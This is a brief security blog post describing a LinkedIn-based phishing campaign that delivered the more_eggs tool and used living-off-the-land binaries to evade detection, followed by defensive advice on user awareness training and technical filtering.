LinkedIn and LOLBINs

Yet another example of how LinkedIn can be abused by the bad guys… a phishing campaign which used job titles scraped from user profiles to convince victims to open and execute evil files and links, which in this case, used an attack tool called more_eggs. The eggy script executes in memory and uses native binaries (“living off the land”) to foil detection efforts.

This kind of simple and effective lure, combined with human beings’ propensity to click before they think, makes the defender’s job that much harder. Using LOLBINs to evade detection doesn’t help use either.

As usual, there ain’t no simple answer to this kind of problem… we need to combine:

User awareness training which focuses on two things: stopping and thinking before taking any action on an email and the fact that phishers use the information we post online to gain our trust.

Technical backstops – improved email and web filtering and behavioral analysis of what our workstations (and users) are up to to detect these stealthy attacks.

Like most scams, this one is 75% about human psychology and 25% about the technology used to pull it off – and we have to fight fire with fire, folks.

Leave a Reply